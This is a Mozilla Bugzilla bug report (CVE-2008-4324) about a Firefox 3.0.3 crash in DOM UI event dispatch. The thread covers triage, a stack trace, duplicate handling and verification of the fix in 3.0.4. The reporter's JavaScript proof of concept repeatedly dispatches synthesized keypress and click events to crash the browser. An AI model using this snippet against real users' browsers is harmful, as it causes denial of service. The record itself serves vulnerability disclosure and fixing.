Closed Bug 457543 (CVE-2008-4324) Opened 16 years ago Closed 16 years ago

FireFox Crashed , Unhandle User Interface Dispatcher Events

Categories

(Core :: DOM: Events, defect)

Product:
Core
Component:
DOM: Events
Version:
1.9.0 Branch
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: adi.zerok, Unassigned)

References

(
URL
)

Details

(Keywords: verified1.9.0.4, Whiteboard: [sg:dupe 454820]) 

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 Crashes with unhandled exception in User Interface Dispatcher Events. If a user try to restore session 3.0.3 version it still gives a crash.

Reproducible: Always

Steps to Reproduce:
<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}


moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}
</script>

The smaller POC Code.
Actual Results:  
The Mozilla Crashes Straight Forward.

Expected Results:  
The software should have handle the exception a with some check introduced to user.

The Bug is getting replicated Everytime.
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
But its really hitting 3.0.3 as per detials provided above.

Need to be fixed.
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

    Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
Status: UNCONFIRMED → NEW
Ever confirmed: true
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?
Didn't Mats just fix this or a variant of this.
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this.
Bug 454820
so whats an actual update. I think I have given specific version 3.0.3 and the

version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Let me know the specifications about Fix
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
Let me know the specifications about Fix
Last query when exactly will it be ported , to 3.0.x builds.
Status: NEW → RESOLVED
Closed: 16 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
CC list accessible: true
If it was resolved previously why not it is ported to 3.0.3 version.
If it was resolved previously why not it is ported to 3.0.3 version.
Resolution: DUPLICATE → WONTFIX
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
URL: http://www.secniche.org/moz303http://www.milw0rm.com/exploits/6614
Group: core-security
Resolution: WONTFIX → DUPLICATE
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED
Alias: CVE-2008-4324
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED
Keywords: fixed1.9.0.4verified1.9.0.4
You need to log in before you can comment on or make changes to this bug.